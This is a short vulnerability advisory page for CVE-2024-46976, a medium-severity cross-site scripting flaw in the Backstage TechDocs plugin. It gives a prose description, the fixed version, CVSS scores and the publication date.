Cross-Site Scripting in Backstage TechDocs Plugin by Spotify
CVE-2024-46976

5.4MEDIUM

Key Information:

Vendor: Backstage
Status: Backstage
Vendor: CVE Published:; 17 September 2024

What is CVE-2024-46976?

The Backstage TechDocs plugin allows for the injection of executable scripts due to insufficient validation of content stored in TechDocs storage buckets. An attacker controlling these contents can craft malicious scripts that may execute in the victim's browser upon accessing documentation or following links crafted by the attacker. The vulnerability has been addressed in version 1.10.13 of the plugin, and users are strongly encouraged to upgrade immediately as there are no alternative mitigation strategies available.

References

https://github.com/backstage/backstage/security/advisorie...

CVSS V3.1

Score:

5.4

Severity:

MEDIUM

Confidentiality:

Low

Integrity:

Low

Availability:

Low

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

Required

Scope:

Changed

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Sep 17, 2024